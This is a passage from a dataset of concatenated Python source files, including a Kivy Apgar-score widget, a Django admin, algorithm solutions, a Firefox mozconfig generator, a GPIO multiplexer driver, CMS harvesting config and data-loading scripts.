ObjectProperty, StringProperty\nfrom kivy.uix.gridlayout import GridLayout\n\nroot = Builder.load_string('''\n\n:\n rows : 3\n canvas.before:\n Color:\n rgba: .5, .5, .5, 1\n Line:\n width: 2\n rectangle: self.x, self.y, self.width, self.height\n BoxLayout:\n Label:\n text: 'Апгар 1 минуты' \n Label:\n text: root.apgar_1\n BoxLayout:\n Label:\n text: 'Апгар 5 минуты' \n Label:\n text: root.apgar_5\n \n BoxLayout\n Label: \n text: root.actions\n\n\n\n''')\n\n\nclass Results(GridLayout):\n actions = StringProperty()\n apgar_1 = StringProperty()\n apgar_5= StringProperty()\n price = StringProperty()\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n # self.actions = 'Исход положительный'\n self.actions = 'Состояние тяжелое'\n self.apgar_1 = f'0'\n self.apgar_5 = f'5'\n\n def update(self):\n self.apgar_1 = str(App.get_running_app().apgar_1)\n self.apgar_5 = str(App.get_running_app().apgar_5)\n","sub_path":"widgets/results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"235735831","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.contrib import admin\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom proposals.actions import export_as_csv_action, send_confirmation_action\nfrom proposals.models import ProposalSection, Proposal\nfrom proposals.models import ProposalKind\n\n\n@admin.register(Proposal)\nclass ProposalAdmin(admin.ModelAdmin):\n list_display = [\n \"id\",\n \"title\",\n \"speaker\",\n \"speaker_email\",\n \"kind\",\n \"audience_level\",\n \"language\",\n \"get_avg\",\n \"get_reviews\",\n \"notified\",\n ]\n list_filter = [\"kind__name\", \"notified\"]\n actions = [\n export_as_csv_action(\"CSV Export\", fields=[\n \"id\",\n \"title\",\n \"speaker\",\n \"speaker_email\",\n \"kind\",\n \"audience_level\",\n \"language\",\n \"avg_property\",\n \"reviews_property\",\n ]),\n send_confirmation_action(\"Sends confirmation email\")\n ]\n\n def get_avg(self, instance):\n return instance.avg()\n get_avg.short_description = _(\"Media\")\n\n def get_reviews(self, instance):\n return instance.reviews_property\n get_reviews.short_description = _(\"Revisiones\")\n\nadmin.site.register(ProposalSection)\nadmin.site.register(ProposalKind)\n","sub_path":"pycones/proposals/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"520080197","text":"#!/usr/bin/python3\nfrom sys import stdin\nfrom bisect import bisect_left\n\ndef LongestIncreasingSubsequenceLength (v, n):\n if n == 0: return 0\n tail = [0] * n\n length = 1 # always points empty slot in tail\n tail [0] = v [0]\n for i in range (1, n):\n if v [i] > tail [length - 1]:\n tail [length] = v [i]\n length += 1\n else: tail [bisect_left (tail, v [i], 0, length - 1)] = v [i]\n return length\n \ndef main ():\n read = stdin.readline\n t = int (read ())\n for t_ in range (t):\n n = int (read ())\n A = list (map (int, read ().split ()))\n B = list (map (int, read ().split ()))\n sub = [0] * (n + 1)\n sb = [p [1] for p in sorted (zip (A, B))]\n print (LongestIncreasingSubsequenceLength (sb, n))\n \nif __name__ == \"__main__\": main ()","sub_path":"_select_the_subset_long_inc_sub_seq.py","file_name":"_select_the_subset_long_inc_sub_seq.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"205224388","text":"# todo:\n# - make get_configs_from_args return an object\n\nimport argparse\nimport os\nimport platform\nimport sys\n\ndef platform_is_64bit():\n return sys.maxsize > 2 ** 32\n\ndef add_common_config_arguments(parser):\n opt_group = parser.add_mutually_exclusive_group()\n opt_group.add_argument('-o', '--opt', action='store_true', help = 'Optimized build')\n opt_group.add_argument('-d', '--optdebug', action='store_true',\n help = 'Optimized build with assertions enabled')\n\n if platform_is_64bit():\n parser.add_argument('--32bit', action='store_true', dest='target32',\n help='Cross compile 32bit build on 64bit host')\n\n san_group = parser.add_mutually_exclusive_group()\n san_group.add_argument('--tsan', action='store_true', help='Thread sanitizer build')\n san_group.add_argument('--asan', action='store_true', help='Address sanitizer build')\n san_group.add_argument('--valgrind', action='store_true', help='Valgrind build')\n\n parser.add_argument('--small-chunk', action='store_true',\n help='Use 256KM chunks instead of the usual 1MB')\n\n parser.add_argument('--concurrent', action='store_true',\n help='GC support for concurrent marking')\n\ndef add_browser_config_arguments(parser):\n add_common_config_arguments(parser)\n parser.add_argument('--minimal', action='store_true',\n help='Disable optional functionality to reduce build time')\n\ndef add_shell_config_arguments(parser):\n add_common_config_arguments(parser)\n parser.add_argument('--armsim', action='store_true', help='ARM simulator build')\n\ndef get_configs_from_args(args):\n names = []\n options = []\n\n def config(name):\n # Not all names may be present\n return getattr(args, name, False)\n\n options.append(\"--with-ccache=$HOME/.mozbuild/sccache/sccache\")\n\n if config('minimal'):\n names.append('minimal')\n options.append('--disable-av1')\n options.append('--disable-cranelift')\n options.append('--disable-ffmpeg')\n options.append('--disable-js-shell')\n options.append('--disable-printing')\n options.append('--disable-synth-speechd')\n options.append('--disable-webspeech')\n options.append('--disable-webrtc')\n\n if config('small_chunk'):\n names.append('smallChunk')\n options.append('--enable-small-chunk-size')\n\n if config('concurrent'):\n names.append('concurrent')\n options.append('--enable-gc-concurrent-marking')\n\n if config('target32'):\n names.append('32bit')\n options.append('--target=i686-pc-linux')\n\n if config('opt'):\n names.append('opt')\n options.append('--enable-optimize')\n options.append('--disable-debug')\n elif config('optdebug'):\n names.append('optdebug')\n options.append('--enable-optimize')\n options.append('--enable-debug')\n options.append('--enable-gczeal')\n else:\n options.append('--disable-optimize')\n options.append('--enable-debug')\n options.append('--enable-gczeal')\n\n if config('tsan'):\n names.append('tsan')\n options.append('--enable-thread-sanitizer')\n options.append('export RUSTFLAGS=\"-Zsanitizer=thread\"')\n options.append('unset RUSTFMT')\n add_sanitizer_options(args, options)\n elif config('asan'):\n names.append('asan')\n options.append('--enable-address-sanitizer')\n add_sanitizer_options(args, options)\n elif config('valgrind'):\n names.append('valgrind')\n options.append('--enable-valgrind')\n options.append('--disable-jemalloc')\n if '--enable-optimize' in options:\n options.remove('--enable-optimize')\n options.append('--enable-optimize=\"-Og -g\"')\n\n if config('armsim'):\n platform = 'arm'\n if platform_is_64bit() and not config('target32'):\n platform = 'arm64'\n names.append(platform + 'sim')\n options.append('--enable-simulator=' + platform)\n\n if config('shell'):\n names.append('shell')\n options.append('--enable-application=js')\n if not config('tsan') and not config('asan'):\n options.append('--enable-warnings-as-errors')\n\n return names, options\n\ndef add_sanitizer_options(args, options):\n # From https://firefox-source-docs.mozilla.org/tools/sanitizer/tsan.html\n # See also build/unix/mozconfig.tsan, mozconfig.asan\n options.append('--disable-jemalloc')\n options.append('--disable-profiling')\n options.append('--enable-debug-symbols')\n options.append('--disable-install-strip')\n if '--enable-optimize' in options:\n options.remove('--enable-optimize')\n options.append('--enable-optimize=\"-O2 -gline-tables-only\"')\n if not args.shell:\n options.append('--disable-elf-hack')\n options.append('--disable-crashreporter')\n options.append('--disable-sandbox')\n options.append('export MOZ_DEBUG_SYMBOLS=1')\n\ndef get_build_name(config_names):\n \"\"\"\n Get a canonical build name from a list of configs.\n \"\"\"\n name_elements = config_names.copy()\n if not name_elements:\n name_elements.append(\"default\")\n return '-'.join(name_elements)\n\ndef write_mozconfig(build_dir, options, build_config):\n with open(build_config, \"w\") as file:\n def w(line):\n file.write(f\"{line}\\n\")\n\n w(f\"mk_add_options MOZ_OBJDIR=@TOPSRCDIR@/{build_dir}\")\n w(\"mk_add_options AUTOCLOBBER=1\")\n for option in options:\n if option.startswith('--'):\n w(f\"ac_add_options {option}\")\n else:\n w(option)\n\ndef setup_environment(args):\n if platform.system() == 'Linux' and args.target32:\n os.environ['PKG_CONFIG_PATH']='/usr/lib/x86_64-linux-gnu/pkgconfig'\n","sub_path":"lib/mozconfig.py","file_name":"mozconfig.py","file_ext":"py","file_size_in_byte":5855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"316684233","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSoftWEAR Multiplexer module. Uses device SN74LV4051A as an analog multiplexer\r\nwith 8 channels. The high level class implements potential MUXes on multiple\r\nchannels. Hardware detection feature provided.\r\n\"\"\"\r\nimport mraa # Main peripheral class. Implements basic digital I/O \r\nimport RoboUtil as util # Utility library to keep track of used I/O pins\r\n\r\nclass RoboMUX:\r\n \"\"\" Implements multiplexer capabilities for all possible channels of an\r\n peripheral. \"\"\"\r\n class MUX:\r\n \"\"\" Implements a single multiplexer for one peripheral channel. \"\"\"\r\n def __init__(self, peripheral, channel, select_pins, detect_pin):\r\n \"\"\" Class constructor. The select pins are from LSB to MSB [A, B, C] \"\"\" \r\n \r\n self.peripheral = peripheral # Save peripheral\r\n self.chn = channel # Save channel\r\n if len(select_pins) is not 3: # Test input parameter validity\r\n raise ValueError(\"Parameter error: the MUX need exactly 3 select pins\")\r\n \r\n \"\"\" Init first select pin as output, and put it to 0 \"\"\"\r\n self._pin_a = mraa.Gpio(util.gpio2mraa[select_pins[0]])\r\n self._pin_a.dir(mraa.DIR_OUT)\r\n self._pin_a.write(0)\r\n \r\n \"\"\" Init second select pin as output, and put it to 0 \"\"\"\r\n self._pin_b = mraa.Gpio(util.gpio2mraa[select_pins[1]])\r\n self._pin_b.dir(mraa.DIR_OUT)\r\n self._pin_b.write(0)\r\n \r\n \"\"\" Init third select pin as output, and put it to 0 \"\"\"\r\n self._pin_c = mraa.Gpio(util.gpio2mraa[select_pins[2]])\r\n self._pin_c.dir(mraa.DIR_OUT)\r\n self._pin_c.write(0)\r\n \r\n \"\"\" Init the detect pin and set it as input \"\"\"\r\n self._pin_detect = mraa.Gpio(util.gpio2mraa[detect_pin])\r\n self._pin_detect.dir(mraa.DIR_IN)\r\n \r\n def select(self, mux_chn):\r\n \"\"\" Selects a MUX channel (0-7). Any future operations will happen \r\n on this selected channel. \"\"\"\r\n if mux_chn < 0 or mux_chn > 7: # Test parameter validity\r\n raise ValueError(\"Parameter error: the MUX has only 8 channels (0-7)\")\r\n if mux_chn & 4 == 4: # Test MSB bit set?\r\n self._pin_c.write(1) # Reflect change on pin C (MSB)\r\n else:\r\n self._pin_c.write(0)\r\n \r\n if mux_chn & 2 == 2: # Test middle bit set?\r\n self._pin_b.write(1) # Reflect change on pin B (middle)\r\n else:\r\n self._pin_b.write(0)\r\n \r\n if mux_chn & 1 == 1: # Test LSB bit set?\r\n self._pin_a.write(1) # Reflect change on pin A (LSB)\r\n else:\r\n self._pin_a.write(0)\r\n \r\n def isMuxConnected(self):\r\n \"\"\" Returns True if the detect pin is High, False otherwise \"\"\"\r\n return bool(self._pin_detect.read())\r\n \r\n \"\"\" The mraa pin objects used by the MUX. \"\"\"\r\n _pin_a = None # The LSB select pin\r\n _pin_b = None\r\n _pin_c = None # The MSB select pin\r\n _pin_detect = None # The detect pin\r\n \r\n \"\"\" Peripheral type. Can be: ADC, I2C, UART, SPI \"\"\"\r\n peripheral = ''\r\n \r\n \"\"\" Channel of the connected peripheral. \"\"\"\r\n chn = '0'\r\n \r\n def __init__(self):\r\n \"\"\" \"\"\"\r\n self._mux_list = []\r\n self._peripheral = ''\r\n \r\n def add_mux_slot(self, peripheral, channel, select_pins, detect_pin):\r\n if peripheral not in ['ADC', 'I2C', 'UART', 'SPI' ]:\r\n raise ValueError(\"Parameter error: peripheral should be ADC, I2C, UART or SPI\") \r\n for pin in select_pins:\r\n if pin not in util.gpio2mraa:\r\n raise ValueError(\"Parameter error: Pin is not a valid GPIO pin\")\r\n if pin in util.UsedGPIO.pin_list:\r\n raise ValueError(\"Parameter error: Pin is already used elsewhere\")\r\n if detect_pin not in util.gpio2mraa:\r\n raise ValueError(\"Parameter error: Pin is not a valid GPIO pin\")\r\n if detect_pin in util.UsedGPIO.pin_list:\r\n raise ValueError(\"Parameter error: Pin is already used elsewhere\")\r\n \r\n if self._peripheral == '':\r\n self._peripheral = peripheral\r\n elif self._peripheral != peripheral:\r\n raise RuntimeError(\"Cannot mix MUX peripherals in the same class!\")\r\n \r\n new_mux = self.MUX(peripheral, channel, select_pins, detect_pin)\r\n self._mux_list.append(new_mux)\r\n \r\n def get_muxed_values(self, channel, func, *args, **kwargs):\r\n \"\"\" Calls the given function with all the arguments and returns a list\r\n of all the return values. If no Mux connected, just returns the \r\n func result. \"\"\"\r\n # Get the MUX from the list for the given channel\r\n c_mux = [mux for mux in self._mux_list if mux.chn == channel]\r\n \r\n if len(c_mux) > 1: # If more than 1 MUX -> signal error\r\n raise RuntimeError(\"The \" + self._peripheral + \" channel \" + str(channel) + \" has too many MUX objects!\")\r\n if len(c_mux) == 0: # If no MUX -> execute and return the function\r\n return func(*args, **kwargs)\r\n \r\n c_mux = c_mux[0] # Just 1 MUX -> select it \r\n ret = [] # Initialize return object to an empty list\r\n \r\n # If MUX exists but is disconnected -> execute and return the function\r\n if c_mux.isMuxConnected() == False:\r\n return func(*args, **kwargs)\r\n \r\n # If MUX exists and is connected -> go through all channels\r\n for idx in range(0,8):\r\n c_mux.select(idx) # Select MUX channel than execute the function\r\n ret.append(func(*args, **kwargs))\r\n return ret # Return the results\r\n \r\n def func_on_mux_chn(self, channel, mux_chn, func, *args, **kwargs):\r\n \"\"\" Executes and returns the given function on the provided MUX channel.\r\n If no MUX is connected, just execute and return the function. \"\"\"\r\n # Get the MUX from the list for the given channel \r\n c_mux = [mux for mux in self._mux_list if mux.chn == channel]\r\n \r\n if len(c_mux) > 1: # If more than 1 MUX -> signal error\r\n raise RuntimeError(\"The \" + self._peripheral + \" channel \" + str(channel) + \" has too many MUX objects!\")\r\n if len(c_mux) == 0: # If no MUX -> execute and return the function\r\n return func(*args, **kwargs)\r\n \r\n c_mux = c_mux[0] # Just 1 MUX -> select it \r\n c_mux.select(mux_chn) # Select the MUX channel\r\n return func(*args, **kwargs) # Execute the function\r\n \r\n def get_mux_connected(self, channel):\r\n \"\"\" Returns True if the MUX is connected, False otherwise \"\"\"\r\n c_mux = [mux for mux in self._mux_list if mux.chn == channel]\r\n \r\n if len(c_mux) > 1: # If more than 1 MUX -> signal error\r\n raise RuntimeError(\"The \" + self._peripheral + \" channel \" + str(channel) + \" has too many MUX objects!\")\r\n if len(c_mux) == 0: # If no MUX -> execute and return the function\r\n return False\r\n \r\n c_mux = c_mux[0] # Just 1 MUX -> select it \r\n return c_mux.isMuxConnected()\r\n \r\n \"\"\" Internal list of MUX objects. 1 MUX object per channel \"\"\"\r\n _mux_list = []\r\n \r\n \"\"\" Peripheral for which this MUX class is instantiated. Does not allow\r\n more than 1 peripheral per class instantiation. \"\"\"\r\n _peripheral = ''\r\n","sub_path":"SoftWEAR/Python/RoboMUX.py","file_name":"RoboMUX.py","file_ext":"py","file_size_in_byte":7917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"267221097","text":"class Solution(object):\n def findMaximumXOR(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n maxVal = 0\n for i in range(0,len(nums)):\n for j in range(i+1,len(nums)):\n xor = nums[i]^nums[j]\n if xor>maxVal:\n maxVal = xor\n return maxVal\n","sub_path":"maximumXor.py","file_name":"maximumXor.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"182027119","text":"'''\r\nCreated on Dec 17, 2016\r\n\r\n@author: Keith gorlen@comcast.net\r\n\r\nReferences:\r\n https://projecteuler.net/problem=150\r\n https://en.wikipedia.org/wiki/Linear_congruential_generator\r\n'''\r\nimport numpy as np\r\nfrom fractions import gcd\r\n\r\ndef lcg(a, c, m):\r\n assert m & (m - 1) == 0, 'modulus not power of 2'\r\n assert (a - 1) & 3 == 0, 'a not divisible by 4'\r\n assert gcd(c, m) == 1, 'modulus and c not relatively prime'\r\n \r\n t = 0\r\n while True:\r\n t = (a*t + c) & (m - 1)\r\n yield t\r\n\r\ndef min_sum(A):\r\n assert len(A.shape) == 2, 'Not 2-dimensional'\r\n assert A.shape[0] == A.shape[1], 'Not square'\r\n assert not np.any(np.triu(A, 1)), 'Non-zero values in upper triangle'\r\n n = A.shape[0]\r\n minidx = divmod(np.argmin(A), n) + (1,) # index of minimum sum\r\n minsum = A[minidx[:2]] # minimum sum\r\n print(minidx, minsum)\r\n th_1 = np.copy(A) # sums of triangles with height h-1\r\n th_2 = np.zeros((n+1, n+1), dtype=np.int_) # sums of triangles with height h-2\r\n for h in range(2, n + 1):\r\n th = np.zeros((n, n), dtype=np.int_) # sums of triangles with height h\r\n for i in range(n - h + 1):\r\n th[i, :i+1] = A[i, :i+1] + th_1[i+1, :i+1] + th_1[i+1, 1:i+2] - th_2[i+2, 1:i+2] \r\n index = divmod(np.argmin(th), n)\r\n if th[index] < minsum:\r\n minsum = th[index]\r\n minidx = index + (h,)\r\n th_1, th_2 = th, th_1\r\n print(minidx, minsum)\r\n return minsum\r\n\r\nTest = [[ 15],\r\n [-14, -7],\r\n [ 20, -13, -5],\r\n [ -3, 8, 23, -26],\r\n [ 1, -4, -5, -18, 5],\r\n [-16, 31, 2, 9, 28, 3]]\r\nassert min_sum(np.reshape(np.fromiter([Test[idx[0]][idx[1]] if idx[1] <= idx[0] else 0\r\n for idx in [divmod(k, len(Test)) for k in range(len(Test)**2)]],\r\n dtype=int, count=len(Test)**2),\r\n (len(Test), -1))) == -42 \r\n\r\nN = 1000\r\nrandnum = lcg(615949, 797807, 1<<20)\r\nA = np.reshape(np.fromiter([next(randnum) - (1<<19) if idx[1] <= idx[0] else 0\r\n for idx in [divmod(k, N) for k in range(N*N)]],\r\n dtype=int, count=N*N),\r\n (N, -1))\r\nassert A[0,0] == 273519\r\nassert A[1,0] == -153582\r\nassert A[1,1] == 450905\r\n\r\nminsum = min_sum(A)\r\nprint(minsum)\r\nassert minsum == -271248680, \"WRONG!\"","sub_path":"p150_min_sum_subtriangle.py","file_name":"p150_min_sum_subtriangle.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"562660528","text":"import os\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\nfolder_path=os.getcwd()\n# background\nfile_name=r'background_MidFreq_300K_60s_20150525_203751.txt'\nfile_path=file_path=folder_path+os.path.sep+file_name\ncache=np.genfromtxt(file_path)\ndark_count=np.median(cache[:,1]) # two columns\n#dark_count=4150\n## Raman shift calibration\nfile_name=r'Ne_MidFreq_65K_60s_20150525_132004_wavenumber.cal'\nfile_path=file_path=folder_path+os.path.sep+file_name\ncache=np.genfromtxt(file_path)\ncal_wavenumber=cache\n\n# data\ndata_file_name=r'MAPbCl3_CU_MidFreq.txt'\nfile_path=folder_path+os.path.sep+data_file_name\ndf=pd.read_table(file_path,sep='\\t',header=0)\n\n# fix row name\ndf.index=cal_wavenumber\n# fix column name\ndf.columns=[int(item.split('K')[0]) for item in df.columns.tolist()]\n# reorder columns\ndf=df.sort_index(axis=1,ascending=True)\n\n# data clean up\nnum_row,num_col=df.shape\ndf=df-dark_count\n#ind=(df.index>-10)&(df.index<10)\n#df=df.drop(df.index[ind])\n#df_normd=df.iloc[260:,:]\n\ngrp=df.groupby(df.columns,axis=1)\ndf=grp.mean()\n\ndf_normd=df/df.max()\n\nind=df.index<600\ndf_300=df.loc[ind,:]\ndf_300=df_300/df_300.max()\n\nind=(df.index>900)&(df.index<1000)\ndf_900=df.loc[ind,:]\ndf_900=df_900/df_900.max()\n\n\nlib_path=r'C:\\Users\\YinshengGuo\\WinPython-64bit-2.7.9.1\\yinshengguo_codes'\nsys.path.append(lib_path)\nfrom util_plotting import plot_df_1d,plot_df_2d\n#==============================================================================\n# plot as series of 1D spectrum with offset\nfig1,ax1=plt.subplots(nrows=1,ncols=2,figsize=(8,6))\nplot_df_1d(df_300,ax1[0],label_loc=None)\nplot_df_1d(df_900,ax1[1],label_loc='right')\nfig1.suptitle(data_file_name,fontweight='bold',fontsize=24)\n#==============================================================================\n\n#==============================================================================\n# 2D color plots\nfig2,ax2=plt.subplots(nrows=1,ncols=2,figsize=(8,6))\nplot_df_2d(df_300,ax2[0])\nplot_df_2d(df_900,ax2[1])\nfig2.suptitle(data_file_name,fontweight='bold')\n#==============================================================================\n","sub_path":"data_crunching_T_20150525.py","file_name":"data_crunching_T_20150525.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"384750502","text":"import FWCore.ParameterSet.Config as cms\nimport FWCore.Utilities.FileUtils as FileUtils\n\nprocess = cms.Process('HARVESTING')\n\n# import of standard configurations\nprocess.load('Configuration.StandardSequences.Services_cff')\nprocess.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')\nprocess.load('FWCore.MessageService.MessageLogger_cfi')\nprocess.load('Configuration.EventContent.EventContent_cff')\nprocess.load('Configuration.StandardSequences.GeometryRecoDB_cff')\nprocess.load('Configuration.StandardSequences.MagneticField_AutoFromDBCurrent_cff')\nprocess.load('Configuration.StandardSequences.EDMtoMEAtRunEnd_cff')\nprocess.load('Configuration.StandardSequences.Harvesting_cff')\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')\n\nprocess.configurationMetadata = cms.untracked.PSet(\n version = cms.untracked.string(': 1.1 $'),\n annotation = cms.untracked.string('harvest nevts:100'),\n name = cms.untracked.string('PyReleaseValidation')\n)\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(-1)\n)\nprocess.options = cms.untracked.PSet(\n Rethrow = cms.untracked.vstring('ProductNotFound'),\n fileMode = cms.untracked.string('FULLMERGE')\n)\n\n# Input source\nprocess.source = cms.Source(\"DQMRootSource\",\n fileNames = cms.untracked.vstring('file:dummyfile.root')\n)\n\n# Other statements\nfrom Configuration.AlCa.GlobalTag import GlobalTag\nprocess.GlobalTag = GlobalTag(process.GlobalTag, 'auto:run2_mc_GRun', '')\n\n# Path and EndPath definitions\nprocess.edmtome_step = cms.Path(process.EDMtoME)\nprocess.validationpreprodHarvesting = cms.Path(process.postValidation*process.hltpostvalidation_preprod)\nprocess.validationprodHarvesting = cms.Path(process.postValidation*process.hltpostvalidation_prod)\nprocess.dqmHarvesting = cms.Path(process.DQMOffline_SecondStep*process.DQMOffline_Certification)\nprocess.validationHarvesting = cms.Path(process.postValidation*process.hltpostvalidation)\n#process.validationHarvestingFS = cms.Path(process.HarvestingFastSim)\nprocess.dqmHarvestingPOG = cms.Path(process.DQMOffline_SecondStep_PrePOG)\nprocess.dqmsave_step = cms.Path(process.DQMSaver)\n\n# Schedule definition \nprocess.schedule = cms.Schedule(process.edmtome_step,process.dqmHarvesting,process.dqmsave_step) \n #----------------------------------------------------------------------------------- \n# Mark's changes start (everything above this point is the output from cmsDriver) \n# \n\n# For some reason a seed harvester isn't included in the standard sequences. If this next processor isn't \n# run then things like efficiencies are just added together instead of recalculated. \nprocess.dqmSaver.saveAtJobEnd = cms.untracked.bool(True)\n#process.dqmSaver.workflow = \"/G4e/RelVal/Validation\"\n#process.dqmSaver.forceRunNumber = cms.untracked.int32(1)\n\nimport FWCore.ParameterSet.Config as cms\nfrom Validation.RecoVertex.HLTpostProcessorVertex_cfi import *\n\nprocess.load('Validation.RecoTrack.HLTpostProcessorTracker_cfi')\nprocess.postProcessorHLTtrackingSequence = cms.Sequence(process.postProcessorHLTtracking+process.postProcessorHLTtrackingSummary)\n\nfrom DQM.TrackingMonitorClient.TrackingEffFromHitPatternClientConfig_cff import *\nprocess.trackingEffFromHitPatternHLT = trackingEffFromHitPattern.clone()\nprocess.trackingEffFromHitPatternHLT.subDirs = cms.untracked.vstring(\n \"HLT/Tracking/pixelTracks/HitEffFromHitPattern\",\n \"HLT/Tracking/iter0/HitEffFromHitPattern\",\n \"HLT/Tracking/iter0HP/HitEffFromHitPattern\",\n \"HLT/Tracking/iter1/HitEffFromHitPattern\",\n \"HLT/Tracking/iter1HP/HitEffFromHitPattern\",\n \"HLT/Tracking/iter2/HitEffFromHitPattern\",\n \"HLT/Tracking/iter2HP/HitEffFromHitPattern\",\n \"HLT/Tracking/iter2Merged/HitEffFromHitPattern\",\n \"HLT/Tracking/iter3HP/HitEffFromHitPattern\",\n \"HLT/Tracking/iter3Merged/HitEffFromHitPattern\",\n \"HLT/Tracking/iter4/HitEffFromHitPattern\",\n \"HLT/Tracking/iter4HP/HitEffFromHitPattern\",\n \"HLT/Tracking/iter4Merged/HitEffFromHitPattern\"\n)\n# Remove the HLT harvesting from the validation harvesting step \nprocess.validationHarvesting = cms.Path(process.postValidation)\nprocess.trackingOnlyHarvesting = cms.Path(process.postProcessorHLTtrackingSequence)\nprocess.trackingEffFromHitHarvesting = cms.Path(process.trackingEffFromHitPatternHLT)\nprocess.vertexingHarvesting = cms.Path(process.postProcessorHLTvertexing)\nprocess.schedule = cms.Schedule(process.edmtome_step,\n process.trackingOnlyHarvesting,\n process.trackingEffFromHitHarvesting,\n process.vertexingHarvesting,\n process.dqmsave_step)\n\nfiles = cms.untracked.vstring() \nfiles = [ \n'file:DQMIO.root'\n] \nprocess.source.fileNames = files \n","sub_path":"Harvesting_cfg.py","file_name":"Harvesting_cfg.py","file_ext":"py","file_size_in_byte":5393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"255742816","text":"# -*- coding: utf-8 -*-\nimport logging\n\nfrom brewtils.schema_parser import SchemaParser\n\nimport beer_garden.api.http\nfrom beer_garden.api.http.handlers.v1.event import EventSocket\n\nlogger = logging.getLogger(__name__)\n\n\nclass EventManager:\n \"\"\"Will simply push events across the connection to the master process\"\"\"\n\n def __init__(self, conn):\n self._conn = conn\n\n def put(self, event):\n beer_garden.api.http.io_loop.add_callback(self._conn.send, event)\n\n\ndef websocket_publish(item):\n \"\"\"Will serialize an event and publish it to all event websocket endpoints\"\"\"\n try:\n beer_garden.api.http.io_loop.add_callback(\n EventSocket.publish, SchemaParser.serialize(item, to_string=True)\n )\n except Exception as ex:\n logger.exception(f\"Error publishing event to websocket: {ex}\")\n","sub_path":"src/app/beer_garden/api/http/processors.py","file_name":"processors.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"452724894","text":"#!/usr/bin/env python3\n# __coding__ : utf-8\n# __author__ : YiXuan\n# __date__ : 10/7/2020 10:38 PM\n# __software__ : PyCharm\n\nimport requests\n\n\nif __name__ == '__main__':\n # url = 'https://www.baidu.com/s'\n url = 'https://www.sogou.com/web'\n kw = input('Please Enter A Key Word:')\n param = {\n # 'wd': kw\n 'query':kw\n }\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36',\n }\n response = requests.get(url=url, params=param, headers=headers)\n response.encoding = 'utf-8'\n page_text = response.text\n print(page_text)\n\n","sub_path":"Crawler/Course/第一章:爬虫基础简介/02.searchEngine.py","file_name":"02.searchEngine.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"152737023","text":"import os\nimport numpy as np\nimport tensorflow as tf\nimport pickle\nimport re\n\nconfig = tf.ConfigProto(allow_soft_placement = True)\nconfig.gpu_options.allow_growth = True\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.5\n\nclass DataFormater(object):\n def __init__(self):\n self.embeddingArr = None\n self.wordNum = None\n self.wordIndDict = None\n self.wordSet = None\n self.ySet = None\n self.yNum = None\n self.yIndDict = None\n self.trainXList = None\n self.trainYList = None\n self.trainXQList = None\n self.maxSeqLen = None\n self.testXList = None\n self.testYList = None\n self.testXQList = None\n self.tesSeqLenList = None\n self.trainXArr = None\n self.trainYArr = None\n self.trainXQArr = None\n self.testXArr = None\n self.testYArr = None\n self.testXQArr = None\n self.testSeqLenArr = None\n self.seqLenList = None\n self.seqLenArr = None\n self.embedDim = None\n self.indToYDict = None\n\n def loadEmbedTable(self, fileName):\n wordList = []\n embeddingList = []\n \n with open(fileName) as inFile:\n for line in inFile:\n lineList = line.rstrip().split(' ')\n wordList += [lineList[0]]\n embeddingList += [[float(x) for x in lineList[1:]]]\n \n embeddingList += [[0.0] * len(embeddingList[0])]\n \n self.embedDim = len(embeddingList[0])\n self.embeddingArr = np.array(embeddingList, dtype = np.float64)\n self.wordNum = len(wordList)\n self.wordIndDict = {wordList[ind]: ind for ind in range(self.wordNum)}\n self.wordSet = set(list(self.wordIndDict.keys()))\n\n def loadTestData(self, xFileName, yFileName):\n self.testXList = []\n self.testXQList = []\n self.testSeqLenList = []\n self.testYList = []\n\n with open(xFileName) as inFile:\n for line in inFile:\n wordList = re.findall(r\"[\\w<>/]+|[.,!?;]\", line.rstrip().split('\\t')[1][1:-1])\n length = len(wordList)\n self.testSeqLenList += [length]\n \n qList = []\n for wordInd in range(len(wordList)):\n word = wordList[wordInd]\n if word.startswith('<') and word.endswith('>'):\n wordList[wordInd] = word[4:-5]\n qList += [wordInd]\n elif word.endswith('>'):\n wordList[wordInd] = word[:-5]\n qList += [wordInd]\n elif word.startswith('<'):\n wordList[wordInd] = word[4:]\n \n self.testXList += [np.array(wordList)]\n self.testXQList += [qList]\n \n with open(yFileName) as inFile:\n for line in inFile:\n self.testYList += [[line.rstrip().split('\\t')[1]]]\n\n print ('maxSeqLen for test data: ', 